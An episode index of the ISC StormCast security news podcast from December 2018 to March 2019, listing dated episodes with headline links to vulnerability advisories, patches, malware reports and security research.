DevOps Tool StackStorm Vulnerability https://quitten.github.io/StackStorm/
Developers Will Not Code Secure By Default https://net.cs.uni-bonn.de/fileadmin/user_upload/naiakshi/Naiakshina_Password_Study.pdf
Gaming Industry Supply Chain Attack https://www.welivesecurity.com/2019/03/11/gaming-industry-scope-attackers-asia/
3/12/2019, 5 minutes, 5 seconds

ISC StormCast for Monday, March 11th 2019

Reversing HTA Files https://isc.sans.edu/forums/diary/Quick+and+Dirty+Malicious+HTA+Analysis/24728/
Apache SOLR Patch https://issues.apache.org/jira/browse/SOLR-13301
Windows 7 + Google Chrome Exploit in the Wild https://security.googleblog.com/2019/03/disclosing-vulnerabilities-to-protect.html
Vulnerable Car Alarms https://www.pentestpartners.com/security-blog/gone-in-six-seconds-exploiting-car-alarms/
3/10/2019, 6 minutes, 50 seconds

ISC StormCast for Friday, March 8th 2019

RSA Panel Video https://www.rsaconference.com/videos/the-five-most-dangerous-new-attack-techniques-and-how-to-counter-them
Disposable E-Mail Addresses https://isc.sans.edu/forums/diary/Keep+an+Eye+on+Disposable+Email+Addresses/24716/
NetApp Default Account Vulnerability https://security.netapp.com/advisory/ntap-20190305-0001/
Cisco NX-OS NX-API Privilege Escalation https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190306-nxos-NXAPI-cmdinj
Slub Backdoor Uses GitHub and Slack https://blog.trendmicro.com/trendlabs-security-intelligence/new-slub-backdoor-uses-github-communicates-via-slack/
3/8/2019, 6 minutes, 23 seconds

ISC StormCast for Thursday, March 7th 2019

More Resume Malspam. Now With Trickbot and EternalBlue https://isc.sans.edu/forums/diary/Malspam+with+passwordprotected+word+docs+still+pushing+IcedID+Bokbot+with+Trickbot/24708/
Cloudflare Deploys Rules to Protect Against Recent Drupal Exploit https://www.bleepingcomputer.com/news/security/cloudflare-deploys-firewall-rule-to-block-new-drupal-exploits/
Cisco DoS Vulnerability Actively Exploited https://www.pentestpartners.com/security-blog/cisco-rv130-its-2019-but-yet-strcpy/
MonitorKit uses macOS Game Engine to Analyze Security Events https://github.com/objective-see
3/7/2019, 6 minutes, 25 seconds

ISC StormCast for Wednesday, March 6th 2019

Comcast Uses same "0000" PIN For All Number Porting Requests https://nakedsecurity.sophos.com/2019/03/05/comcast-security-nightmare-default-0000-pin-on-everybodys-account/
NSA Releases Ghidra Reverse Analysis Tool https://ghidra-sre.org/
Recent Google Chrome Vulnerability Being Exploited https://chromereleases.googleblog.com/2019/03/stable-channel-update-for-desktop.html?m=1
Android Monthly Security Bulletin https://source.android.com/security/bulletin/2019-03-01
3/6/2019, 5 minutes, 35 seconds

ISC StormCast for Tuesday, March 5th 2019

MacOS Unpatched Privilege Escalation Vulnerability made Public https://bugs.chromium.org/p/project-zero/issues/detail?id=1726
Windows Exploit Suggester Next Generation Released https://github.com/bitsadmin/wesng
Docker Vulnerability used for Crypto Miners https://www.imperva.com/blog/hundreds-of-vulnerable-docker-hosts-exploited-by-cryptocurrency-miners/
Russian GPS Jamming Exercises https://thebarentsobserver.com/en/security/2019/03/russian-military-officials-arrive-oslo-norway-provides-facts-gps-jamming
3/5/2019, 5 minutes, 50 seconds

ISC StormCast for Monday, March 4th 2019

Cisco Router Patch https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190227-rmi-cmd-ex
Coldfusion Patch and Exploit https://www.carehart.org/blog/client/index.cfm/2019/3/1/urgent_CF_security_update_Part_1
Ransomware Impersonates Protonmail https://twitter.com/demonslay335/status/1097866931762282498
eBay Site Used for eBay Phish (article in German) https://www.heise.de/security/meldung/eBay-Phishing-auf-eBay-Seite-4324266.html
3/4/2019, 5 minutes, 39 seconds

ISC StormCast for Friday, March 1st 2019

Emotet Backend Analysis https://maxkersten.nl/binary-analysis-course/malware-analysis/emotet-droppers/
Kaspersky Vs. Chromecast https://www.bleepingcomputer.com/news/security/kaspersky-av-having-certificate-conflicts-with-google-chromecast/
MageCart Updates https://www.riskiq.com/research/inside-magecart/
3/1/2019, 6 minutes, 5 seconds

ISC StormCast for Thursday, February 28th 2019

Coinhive Shutting Down https://coinhive.com/blog/en/discontinuation-of-coinhive
Azure Blob Storage Phishing https://www.edgewave.com/phishing/feeling-blue-about-phishing/
Old 2014 Elastic Search Vulnerability Exploited https://blog.talosintelligence.com/2019/02/cisco-talos-honeypot-analysis-reveals.html
Latest Drupal Vulnerability Exploited https://www.imperva.com/blog/latest-drupal-rce-flaw-used-by-cryptocurrency-miners-and-other-attackers/
F5 Big IP Patches https://support.f5.com/csp/article/K91026261
2/28/2019, 5 minutes, 8 seconds

ISC StormCast for Wednesday, February 27th 2019

Thunderbolt "Thunderclap" Vulnerabilities https://thunderclap.io/thunderclap-paper-ndss2019.pdf
Altering Signed PDF Documents https://www.pdf-insecurity.org/
NVidia Patches https://nvidia.custhelp.com/app/answers/detail/a_id/4772
2/27/2019, 5 minutes

ISC StormCast for Tuesday, February 26th 2019

WinRAR ACE Vulnerability used in Malspam https://twitter.com/360TIC/status/1099987939818299392
Sextortion Email With QR Code https://isc.sans.edu/forums/diary/Sextortion+Email+Variant+With+QR+Code/24686/
ICANN Pushes DNSSEC to Defend Against DNS Zone Manipulation https://www.icann.org/news/announcement-2019-02-22-en
Android FIDO2 Certification https://fidoalliance.org/android-now-fido2-certified-accelerating-global-migration-beyond-passwords/
2/26/2019, 7 minutes, 9 seconds

ISC StormCast for Monday, February 25th 2019

B0r0nt0k Linux Server Ransomware https://www.bleepingcomputer.com/news/security/b0r0nt0k-ransomware-wants-75-000-ransom-infects-linux-servers/
Cr1ptT0r Ransomware Targets D-Link NAS Devices https://www.bleepingcomputer.com/forums/t/691852/cr1ptt0r-ransomware-files-encrypted-readmetxt-support-topic/page-3
LinkedIn Messages Used to Push Fake Job Offers https://www.proofpoint.com/us/threat-insight/post/fake-jobs-campaigns-delivering-moreeggs-backdoor-fake-job-offers
2/25/2019, 5 minutes, 29 seconds

ISC StormCast for Friday, February 22nd 2019

Adobe Re-Patches Reader/Acrobat Data Leakage Bug https://helpx.adobe.com/security/products/acrobat/apsb19-13.html
Microsoft Releases Fix for DoS Vulnerability in IIS https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/ADV190005
Drupal Fixes Remote Code Execution Vulnerability https://www.drupal.org/sa-core-2019-003
Linux Kernel Code Execution Vulnerability https://nvd.nist.gov/vuln/detail/CVE-2019-8912
MikroTik Unauthenticated Proxy https://medium.com/tenable-techblog/mikrotik-firewall-nat-bypass-b8d46398bf24
2/22/2019, 6 minutes, 34 seconds

ISC StormCast for Thursday, February 21st 2019

Microsoft Edge Whitelists Facebook to Run Flash https://bugs.chromium.org/p/project-zero/issues/detail?id=1722
Chinese Android Banking App Stores Screenshots of Other Apps https://jqknews.com/news/141073-Jingdong_Finance_denied_stealing_user_information_saying_that_the_image_cache_was_only_local.html
Password Manager Vulnerabilities https://www.securityevaluators.com/casestudies/password-manager-hacking/
2/21/2019, 6 minutes, 7 seconds

ISC StormCast for Wednesday, February 20th 2019

Russian Malspam Pushing Shade/Troldesh Ransomware https://isc.sans.edu/forums/diary/More+Russian+language+malspam+pushing+Shade+Troldesh+ransomware/24668/
Bitdefender Releases GandCrab Decrypter https://labs.bitdefender.com/2019/02/new-gandcrab-v5-1-decryptor-available-now/
Bank Infrastructure Used in Phishing Attacks (article in Russian) https://www.group-ib.ru/blog/incident
SHA-2 Patch For Windows 7 / 2008 R2 SP1 https://support.microsoft.com/en-us/help/4472027/2019-sha-2-code-signing-support-requirement-for-windows-and-wsus
2/20/2019, 6 minutes, 8 seconds

ISC StormCast for Tuesday, February 19th 2019

Know What You Are Logging https://isc.sans.edu/forums/diary/Know+What+You+Are+Logging/24656/
Spectre Software Mitigation Insufficient https://arxiv.org/pdf/1902.05178.pdf
VMWare Releases Update To Address runc Vulnerability https://www.vmware.com/security/advisories/VMSA-2019-0001.html
Swedish Healthcare Breach Leaks Phone Call Recordings https://computersweden.idg.se/2.2683/1.714787/inspelade-samtal-1177-vardguiden-oskyddade-internet
2/19/2019, 5 minutes, 29 seconds

ISC StormCast for Monday, February 18th 2019

Snap Patches Available https://wiki.ubuntu.com/SecurityTeam/KnowledgeBase/SnapSocketParsing
Finding Property Values in Office Documents https://isc.sans.edu/forums/diary/Finding+Property+Values+in+Office+Documents/24652/
Bro-Sysmon https://engineering.salesforce.com/test-out-bro-sysmon-a6fad1c8bb88
Cryptojacking Apps in Microsoft App Store https://www.symantec.com/blogs/threat-intelligence/cryptojacking-apps-microsoft-store
2/18/2019, 5 minutes, 5 seconds

ISC StormCast for Friday, February 15th 2019

PDF includes SMB Link https://isc.sans.edu/forums/diary/Suspicious+PDF+Connecting+to+a+Remote+SMB+Share/24646/
QNAP Malware https://www.qnap.com/en/security-advisory/nas-201902-13
Bomb Threat Spammers Arrested https://www.justice.gov/usao-cdca/pr/members-hacker-collective-face-federal-charges-attacking-computer-systems-emailing-mass
Managed Service Providers Targeted By Ransomware https://www.bleepingcomputer.com/news/security/ransomware-attacks-target-msps-to-mass-infect-customers/
2/15/2019, 5 minutes, 47 seconds

ISC StormCast for Thursday, February 14th 2019

Fake Updates Campaign Still Active in 2019 https://isc.sans.edu/forums/diary/Fake+Updates+campaign+still+active+in+2019/24640/
macOS Malware (Shlayer) Disables Gatekeeper https://www.carbonblack.com/2019/02/12/tau-threat-intelligence-notification-new-macos-malware-variant-of-shlayer-osx-discovered/
Microsoft Exchange Server Patch (Errata for yesterday's podcast) https://support.microsoft.com/en-ca/help/4490060/exchange-web-services-push-notifications-can-provide-unauthorized-acce
Cisco Network Assurance Engine Password Synchronization Issue https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190212-nae-dos
VFEMail Backup Failure https://www.vfemail.net/
2/14/2019, 5 minutes, 50 seconds

ISC StormCast for Wednesday, February 13th 2019

Microsoft Patch Tuesday https://isc.sans.edu/forums/diary/Microsoft+February+2019+Patch+Tuesday/24638/
Adobe Updates https://helpx.adobe.com/security.html
Ubuntu Linux snapd "dirty_sock" exploit https://shenaniganslabs.io/2019/02/13/Dirty-Sock.html
2/13/2019, 5 minutes, 24 seconds

ISC StormCast for Tuesday, February 12th 2019

Severe Docker runc Vulnerability https://seclists.org/oss-sec/2019/q1/119
MacOS Mojave Privacy Flaw https://lapcatsoftware.com/articles/mojave-privacy3.html
Android Malware Steals Crypto Addresses from Clipboard https://www.welivesecurity.com/2019/02/08/first-clipper-malware-google-play/
Not An E-Mail Virus, Just Interesting Malware https://isc.sans.edu/forums/diary/Have+You+Seen+an+Email+Virus+Recently/24634/
2/12/2019, 4 minutes, 54 seconds

ISC StormCast for Monday, February 11th 2019

Phishing Kit with JavaScript Keylogger https://isc.sans.edu/forums/diary/Phishing+Kit+with+JavaScript+Keylogger/24622/
Phishing Via Google Translate https://blogs.akamai.com/sitr/2019/02/phishing-attacks-against-facebook-google-via-google-translate.html
iPhone Apps Record Screens https://techcrunch.com/2019/02/06/iphone-session-replay-screenshots/
Packet Challenge https://johannes.homepc.org/packet10.txt
2/11/2019, 6 minutes, 49 seconds

ISC StormCast for Friday, February 8th 2019

Value of UAC https://isc.sans.edu/forums/diary/UAC+is+not+all+that+bad+really/24620/
Apple Releases Facetime Patch https://support.apple.com/en-us/HT201222
Skype Video Now Allows For Blurred Background https://blogs.skype.com/news/2019/02/06/introducing-background-blur-in-skype/
Microsoft Exchange Server Advisory https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/adv190007
2/8/2019, 5 minutes, 28 seconds

ISC StormCast for Thursday, February 7th 2019

Android Monthly Security Update https://source.android.com/security/bulletin/2019-02-01.html
Skia Graphics Library Vulnerability https://googleprojectzero.blogspot.com/2019/02/the-curious-case-of-convexity-confusion.html
Google Chrome Password Check https://chrome.google.com/webstore/detail/password-checkup/pncabnpcffmalkkjpajodfhijclecjno/related
Hancitor HelloFax Malspam https://isc.sans.edu/forums/diary/Hancitor+malspam+and+infection+traffic+from+Tuesday+20190205/24616/
2/6/2019, 6 minutes, 26 seconds

ISC StormCast for Wednesday, February 6th 2019

Mitigations against Mimikatz Style Attacks https://isc.sans.edu/forums/diary/Mitigations+against+Mimikatz+Style+Attacks/24612/
LibreOffice Macro Vulnerability https://insert-script.blogspot.com/2019/02/libreoffice-cve-2018-16858-remote-code.html
Firefox 65 Breaks HTTPS AV Scanning https://bugzilla.mozilla.org/show_bug.cgi?id=1523701
RDP Client Vulnerabilities https://research.checkpoint.com/reverse-rdp-attack-code-execution-on-rdp-clients/
DNS "Lookingglass" https://isc.sans.edu/tools/dnslookup.html
2/6/2019, 6 minutes, 42 seconds

ISC StormCast for Tuesday, February 5th 2019

Exploiting Struts in vCenter https://isc.sans.edu/forums/diary/Struts+Vulnerability+CVE20175638+on+VMware+vCenter+the+Gift+that+Keeps+on+Giving/24606/
Wikipedia Tech Support Scam https://isc.sans.edu/forums/diary/Wikipedia+Articles+as+part+of+Tech+Support+Scamming+Campaigns/24608/
Stealing MacOS Keychain https://www.youtube.com/watch?v=nYTBZ9iPqsU
Beauty Camera Ads for Android include Adware https://blog.trendmicro.com/trendlabs-security-intelligence/various-google-play-beauty-camera-apps-sends-users-pornographic-content-redirects-them-to-phishing-websites-and-collects-their-pictures/
2/5/2019, 5 minutes, 21 seconds

ISC StormCast for Monday, February 4th 2019

Sextortion EMail Update https://isc.sans.edu/forums/diary/Sextortion+Follow+the+Money+Part+3+The+cashout+begins/24592/
Ubiquiti Devices Used in DDoS Attack https://blog.rapid7.com/2019/02/01/ubiquiti-discovery-service-exposures/?fbclid=IwAR0OUPQIfSV7YsBLvkjoC2WIbe_E4p9WGAM4LCTsL9TKr30I7aQ2Qwqoins
Google Chrome Experimenting with Typo Domain Detection https://www.usenix.org/conference/enigma2019/presentation/stark
YouTube Copyright Extortion https://www.youtube.com/watch?v=Q0i-sLESXqo
2/4/2019, 7 minutes, 43 seconds

ISC StormCast for Friday, February 1st 2019

Tracking DNS Changes https://isc.sans.edu/forums/diary/Tracking+Unexpected+DNS+Changes/24596/
SystemD/JournalD PoC Exploit https://capsule8.com/blog/exploiting-systemd-journald-part-1/
Windows Defender Boot Issues https://support.microsoft.com/en-us/help/4052623/update-for-windows-defender-antimalware-platform
Mac Malware Steals Cryptocurrency Exchange Cookies https://unit42.paloaltonetworks.com/mac-malware-steals-cryptocurrency-exchanges-cookies/
2/1/2019, 6 minutes, 3 seconds

ISC StormCast for Thursday, January 31st 2019

Chrome Update https://www.zdnet.com/article/google-chrome-72-removes-hpkp-deprecates-tls-1-0-and-tls-1-1/
Firefox Update https://techdows.com/2019/01/firefox-to-disable-extensions-in-private-browsing-mode-by-default.html
Facebook (and Google) Research VPN https://techcrunch.com/2019/01/29/facebook-project-atlas/ https://www.macrumors.com/2019/01/30/google-exploiting-apple-enterprise-certificate/
RCE In Samsung Store via "evilgrade" https://www.adyta.pt/en/2019/01/29/writeup-samsung-app-store-rce-via-mitm-2/
1/31/2019, 5 minutes, 50 seconds

ISC StormCast for Wednesday, January 30th 2019

Phishing Not Ready for IPv6 https://isc.sans.edu/forums/diary/A+Not+So+Well+Done+Phish+Why+Attackers+need+to+Implement+IPv6+Now/24582/
Apple Disables Facetime Group Messages https://www.apple.com/support/systemstatus/
Outlook 365 Safe Link Errors https://twitter.com/Swiss_Jay/status/1090271197193940992
1/30/2019, 5 minutes, 49 seconds

ISC StormCast for Tuesday, January 29th 2019

Relaying Exchange's NTLM Authentication to Become Domain Admin https://isc.sans.edu/forums/diary/Relaying+Exchanges+NTLM+authentication+to+domain+admin+and+more/24578/
Facetime Bug Allows Users to Receive Audio before Call is Accepted https://9to5mac.com/2019/01/28/facetime-bug-hear-audio/
AZORult Fake (signed) Google Update https://blog.minerva-labs.com/azorult-now-as-a-signed-google-update
1/29/2019, 5 minutes, 9 seconds

ISC StormCast for Monday, January 28th 2019

Cisco RV320/325 Router Vulnerability Exploited https://github.com/0x27/CiscoRV320Dump https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-inject https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-info
HTTP Signed Exchanges https://wicg.github.io/webpackage/draft-yasskin-http-origin-signed-responses.html
BGP Experiments Disrupt Routers https://mailman.nanog.org/pipermail/nanog/2019-January/098761.html
Packet Challenge https://johannes.homepc.org/packet9.txt
1/28/2019, 7 minutes, 3 seconds

ISC StormCast for Friday, January 25th 2019

Ghostscript Remote Code Execution Vulnerability https://www.openwall.com/lists/oss-security/2019/01/23/5
Abusing Exchange to Obtain Domain Admin https://dirkjanm.io/abusing-exchange-one-api-call-away-from-domain-admin/
IPC Voucher UaF Remote Jailbreak http://blogs.360.cn/post/IPC%20Voucher%20UaF%20Remote%20Jailbreak%20Stage%202%20(EN).html
Cisco Security Updates https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-sdwan-bo
1/25/2019, 5 minutes, 37 seconds

ISC StormCast for Thursday, January 24th 2019

DHS Emergency Directive Regarding DNS Tampering https://cyber.dhs.gov/ed/19-01/
Abuse of Trusted Microsoft Azure Domains https://github.com/MicrosoftDocs/OfficeDocs-Enterprise/issues/233
Tech Support Scammers Unmasked https://www.fidusinfosec.com/turning-the-tables-on-virgin-media-twitter-scammers/
1/24/2019, 5 minutes, 11 seconds

ISC StormCast for Wednesday, January 23rd 2019

Turning MISP Data into RPZs https://isc.sans.edu/forums/diary/DNS+Firewalling+with+MISP/24556/
Man-in-the-Middle Vulnerability in apt https://justi.cz/security/2019/01/22/apt-rce.html
PHP PEAR Compromised Package http://pear.php.net
Apple Security Updates https://support.apple.com/en-us/HT201222
1/23/2019, 7 minutes, 8 seconds

ISC StormCast for Tuesday, January 22nd 2019

Suspicious GET Request: Do you know what it is? https://isc.sans.edu/forums/diary/Suspicious+GET+Request+Do+You+Know+What+This+Is/24552/
DNS Flag Day https://dnsflagday.net/
1/22/2019, 5 minutes, 31 seconds

ISC StormCast for Monday, January 21st 2019

Drupal Patches https://www.drupal.org/sa-core-2019-002 https://www.drupal.org/sa-core-2019-001
WPML User Data Compromised and Used in EMail To Customers https://wpml.org/2019/01/wpml-org-site-back-to-normal-after-an-attack-during-the-weekend/
Targeted Attack Uses Google Drive for Exfiltration https://unit42.paloaltonetworks.com/darkhydrus-delivers-new-trojan-that-can-use-google-drive-for-c2-communications/
Packet Challenge Solution https://johannes.homepc.org/packet8.txt
1/21/2019, 6 minutes, 13 seconds

ISC StormCast for Friday, January 18th 2019

Android Malware Uses Motion Detection to Evade Analysis https://blog.trendmicro.com/trendlabs-security-intelligence/google-play-apps-drop-anubis-banking-malware-use-motion-based-evasion-tactics/
Twitter for Android Bug https://help.twitter.com/en/protected-tweets-android
Introduction to WebAuthn/FIDO2 https://medium.com/@herrjemand/introduction-to-webauthn-api-5fd1fb46c285
Ransomware As a Service https://www.bleepingcomputer.com/news/security/blackrouter-ransomware-promoted-as-a-raas-by-iranian-developer/
1/18/2019, 6 minutes, 20 seconds

ISC StormCast for Thursday, January 17th 2019

Emotet and Other Malspam Campaigns Resume After Holiday Break https://isc.sans.edu/forums/diary/Emotet+infections+and+followup+malware/24532/
Magecart Delivered Via Compromised Advertising Sites https://blog.trendmicro.com/trendlabs-security-intelligence/new-magecart-attack-delivered-through-compromised-advertising-supply-chain/
Premisys Identicard Vulnerabilities https://www.tenable.com/security/research/tra-2019-01
ES File Explorer Open Port Vulnerability https://github.com/fs0c131y/ESFileExplorerOpenPortVuln
1/17/2019, 5 minutes, 54 seconds

ISC StormCast for Wednesday, January 16th 2019

MSFT Skype/Team Foundation Server Patches https://isc.sans.edu/forums/diary/Microsoft+Publishes+Patches+for+Skype+for+Business+and+Team+Foundation+Server/24540/
SCP Client Vulnerabilities https://sintonen.fi/advisories/scp-client-multiple-vulnerabilities.txt
Server Hosting Companies Trivially Hacked https://www.websiteplanet.com/blog/report-popular-hosting-hacked/
Vulnerabilities in Industrial Remote Controls https://www.trendmicro.com/vinfo/us/security/news/vulnerabilities-and-exploits/attacks-against-industrial-machines-via-vulnerable-radio-remote-controllers-security-analysis-and-recommendations
Oracle Quarterly Critical Patch Update https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html
1/16/2019, 6 minutes, 6 seconds

ISC StormCast for Tuesday, January 15th 2019

Microsoft LAPS - Blue Team / Red Team https://isc.sans.edu/forums/diary/Microsoft+LAPS+Blue+Team+Red+Team/24528/
Intel SGX Platform Update https://www.intel.com/content/www/us/en/security-center/advisory/INTEL-SA-00203.html
Godaddy Injecting JavaScript https://www.igorkromin.net/index.php/2019/01/13/godaddy-is-sneakily-injecting-javascript-into-your-website-and-how-to-stop-it/
Play with Docker Vulnerability https://www.cyberark.com/threat-research-blog/how-i-hacked-play-with-docker-and-remotely-ran-code-on-the-host/
1/14/2019, 5 minutes, 59 seconds

ISC StormCast for Monday, January 14th 2019

Government Website TLS Certificates Expire due to Partial Shutdown https://news.netcraft.com/archives/2019/01/10/gov-security-falters-during-u-s-shutdown.html
Firefox EOL Plan for Flash https://bugzilla.mozilla.org/show_bug.cgi?id=1519434
Fake Movie File Malware https://www.bleepingcomputer.com/news/security/fake-movie-file-infects-pc-to-steal-cryptocurrency-poison-google-results/
Microsoft Windows Patch Breaks Access 97 https://borncity.com/win/2019/01/11/windows-january-2019-updates-breaks-access-to-access-dbs/
Snorpy Assists in Snort Rule Writing https://isc.sans.edu/forums/diary/Snorpy+a+Web+Base+Tool+to+Build+SnortSuricata+Rules/24522/
Packet Challenge
1/14/2019, 5 minutes, 51 seconds

ISC StormCast for Friday, January 11th 2019

Old Tricks still work: I love you Malspam https://isc.sans.edu/forums/diary/Heartbreaking+Emails+Love+You+Malspam/24512/
Juniper Updates Released https://kb.juniper.net/InfoCenter/index?page=content&id=JSA10916&cat=SIRT_1&actp=LIST https://kb.juniper.net/InfoCenter/index?page=content&id=JSA10918&cat=SIRT_1&actp=LIST
New Systemd/Journald Exploit Release https://www.qualys.com/2019/01/09/system-down/system-down.txt
Global DNS Hijacking https://www.fireeye.com/blog/threat-research/2019/01/global-dns-hijacking-campaign-dns-record-manipulation-at-scale.html
1/11/2019, 5 minutes, 41 seconds

ISC StormCast for Thursday, January 10th 2019

Simple Mechanism for Creating Certificates https://blog.filippo.io/mkcert-valid-https-certificates-for-localhost/
Review of Smartphone Face Recognition https://www.consumentenbond.nl/veilig-internetten/gezichtsherkenning-te-hacken
Google Public DNS now supports DNS-over-TLS https://security.googleblog.com/2019/01/google-public-dns-now-supports-dns-over.html
Malwarebytes Freezes Windows 7 https://forums.malwarebytes.com/topic/241223-malwarebytes-for-windows-and-windows-7-freezelock-up/
German Police Looking for MAC Address https://polizei.brandenburg.de/pressemeldung/f8-e0-79-af-57-eb-cyber-fahndung-nach-ma/1310909
1/10/2019, 5 minutes, 54 seconds

ISC StormCast for Wednesday, January 9th 2019

Microsoft Patch Tuesday https://isc.sans.edu/forums/diary/Microsoft+January+2019+Patch+Tuesday/24504/ https://patchtuesdaydashboard.com/
Adobe Updates https://helpx.adobe.com/security.html
Google Play Store Adware https://blog.trendmicro.com/trendlabs-security-intelligence/adware-disguised-as-game-tv-remote-control-apps-infect-9-million-google-play-users/
Ethereum Classic 51% Attack https://blog.coinbase.com/ethereum-classic-etc-is-currently-being-51-attacked-33be13ce32de
1/9/2019, 5 minutes, 48 seconds

ISC StormCast for Tuesday, January 8th 2019

Malware of the Day: Encrypted Word Document https://isc.sans.edu/forums/diary/Analyzing+Encrypted+Malicious+Office+Documents/24498/
Apple iOS Apps Reaching Out to Malware Server https://www.wandera.com/risky-apps/
NCSC Offers Assistance Against Attacks from Foreign Governments https://www.dni.gov/index.php/ncsc-how-we-work/ncsc-know-the-risk-raise-your-shield/ncsc-awareness-materials
Hardware Agnostic Side Channel Attacks https://arxiv.org/abs/1901.01161
1/8/2019, 7 minutes, 2 seconds

ISC StormCast for Monday, January 7th 2019

Malware in TAR Files https://isc.sans.edu/forums/diary/Malicious+tar+Attachments/24496/
ReiKey MacOS Keystroke Logger Detector https://objective-see.com/products/reikey.html
Phishing Tool Kit uses Simple Substitution Fonts https://www.proofpoint.com/us/threat-insight/post/phishing-template-uses-fake-fonts-decode-content-and-evade-detection
1/7/2019, 6 minutes, 42 seconds

ISC StormCast for Friday, January 4th 2019

Malware Leaks Victim Data via FTP https://isc.sans.edu/forums/diary/Malicious+Script+Leaking+Data+via+FTP/24484/
Hijacking Dormant Twitter Accounts https://techcrunch.com/2019/01/02/hackers-islamic-state-propaganda-twitter/
Android Authentication Bypass via Skype https://www.youtube.com/watch?v=EiEcwOfTFqI
Critical Adobe Updates https://helpx.adobe.com/security/products/acrobat/apsb19-02.html
FilesLocker Ransomware Master Key Published https://www.bleepingcomputer.com/news/security/master-decryption-key-released-for-fileslocker-ransomware/
1/4/2019, 6 minutes, 7 seconds

ISC StormCast for Thursday, January 3rd 2019

Gift Card Scams https://isc.sans.edu/forums/diary/Gift+Card+Scams+on+the+rise/24482/
WiFi Chipset Exploit https://2018.zeronights.ru/wp-content/uploads/materials/19-Researching-Marvell-Avastar-Wi-Fi.pdf?fbclid=IwAR07FmZGKLKdJAKI4g0o-Wm-dLGwclV8Hhi-L4_HRlklldY8UC6WY72AdAw
1/3/2019, 5 minutes, 51 seconds

ISC StormCast for Wednesday, January 2nd 2019

Bypassing Vein Scanner Authentication (in German) https://media.ccc.de/v/35c3-9545-venenerkennung_hacken
Hacking Smart Lightbulbs and Firmware Exploits https://media.ccc.de/v/35c3-9723-smart_home_-_smart_hack
European Union Offers Bug Bounty for Open Source Software https://juliareda.eu/fossa/
Bypassing Google ReCaptcha https://github.com/ecthros/uncaptcha2
1/2/2019, 7 minutes, 15 seconds

ISC StormCast for Friday, December 28th 2018

Phishing Attack Uses IP Counter https://isc.sans.edu/forums/diary/Matryoshka+Phish/24460/
JungleSec Ransomware Attacks via IPMI https://www.bleepingcomputer.com/news/security/junglesec-ransomware-infects-victims-through-ipmi-remote-consoles/
Microsoft Edge PoC RCE Exploit https://github.com/phoenhex/files/blob/master/pocs/cve-2018-8629-chakra.js
12/28/2018, 6 minutes, 4 seconds

ISC StormCast for Thursday, December 27th 2018

Problems with IE Emergency Patch https://support.microsoft.com/en-us/help/4483229/december192018kb4483229osbuild143932670
Bitcoin Blacklists https://isc.sans.edu/forums/diary/Bitcoin+Blacklists/24456/
D-Link DIR-816 A2 Stack Overflow https://github.com/RootSoull/Vuln-Poc/tree/master/D-Link/DIR-816
12/26/2018, 2 minutes, 44 seconds

ISC StormCast for Friday, December 21st 2018

Windows 0-Day PoC Published: Arbitrary File Read as System https://sandboxescaper.blogspot.com/2018/12/readfile-0day.html Attacks Against 2FA in the Middle East https://www.amnesty.org/en/latest/research/2018/12/when-best-practice-is-not-good-enough/ FBI Shuts Down Booter Services http://www.documentcloud.org/documents/5648950-DOJ-indictments-in-booter-cases.html Intel VISA Undocumented Debug Feature https://www.blackhat.com/asia-19/briefings/schedule/index.html#intel-visa-through-the-rabbit-hole-13513
12/21/2018, 5 minutes, 44 seconds

ISC StormCast for Thursday, December 20th 2018

Microsoft Publishes Emergency Patch for Internet Explorer https://isc.sans.edu/forums/diary/Microsoft+OOB+Patch+for+Internet+Explorer+Scripting+Engine+Memory+Corruption+Vulnerability/24438/ Restricting PowerShell Capabilities with NetSh https://isc.sans.edu/forums/diary/Restricting+PowerShell+Capabilities+with+NetSh/24434/ Remotely Bricking a Server https://eclypsium.com/2018/12/19/remotely-bricking-a-server/
12/20/2018, 4 minutes, 16 seconds

ISC StormCast for Wednesday, December 19th 2018

ASUS Vulnerabilities https://www.secureauth.com/labs/advisories/asus-drivers-elevation-privilege-vulnerabilities GIGABYTE Vulnerabilities https://www.secureauth.com/labs/advisories/gigabyte-drivers-elevation-privilege-vulnerabilities Apple App Store Phishing https://www.bleepingcomputer.com/news/security/widespread-apple-id-phishing-attack-pretends-to-be-app-store-receipts Kibana Vulnerability Exploited https://www.cyberark.com/threat-research-blog/execute-this-i-know-you-have-it/ Decrypter for InsaneCrypt and Everbe 1 https://www.bleepingcomputer.com/ransomware/decryptor/how-to-decrypt-the-insanecrypt-or-everbe-1-family-of-ransomware/ http://id-ransomware.malwarehunterteam.com/ SANS Holiday Hack Challenge https://www.kringlecon.com
12/19/2018, 5 minutes, 35 seconds

ISC StormCast for Tuesday, December 18th 2018

Password Protected ZIP with Maldoc https://isc.sans.edu/forums/diary/Password+Protected+ZIP+with+Maldoc/24426/ Memes Used as Covert Command and Control Channel https://blog.trendmicro.com/trendlabs-security-intelligence/cybercriminals-use-malicious-memes-that-communicate-with-malware/ Shamoon Disk Wiper Malware is Back https://unit42.paloaltonetworks.com/shamoon-3-targets-oil-gas-organization/
12/18/2018, 5 minutes, 23 seconds

ISC StormCast for Monday, December 17th 2018

Magellan Sqlite Vulnerability https://blade.tencent.com/magellan/index_en.html Logitech Options Vulnerability https://bugs.chromium.org/p/project-zero/issues/detail?id=1663 Intel NUC BIOS Protection Flaw https://embedi.org/blog/nuclear-explotion/ HiddenTear Ransomware Decrypter https://www.bleepingcomputer.com/ransomware/decryptor/how-to-decrypt-hiddentear-ransomware-with-ht-brute-forcer/
12/17/2018, 4 minutes, 57 seconds

ISC StormCast for Friday, December 14th 2018

Fake E-Mail Bomb Threats https://www.cnn.com/2018/12/13/us/email-bomb-threats/index.html Phishing Via Non-Delivery Notices https://isc.sans.edu/forums/diary/Phishing+Attack+Through+NonDelivery+Notification/24412/ LamePyre MacOS Malware https://blog.malwarebytes.com/detections/osx-lamepyre/
12/14/2018, 6 minutes, 39 seconds

ISC StormCast for Thursday, December 13th 2018

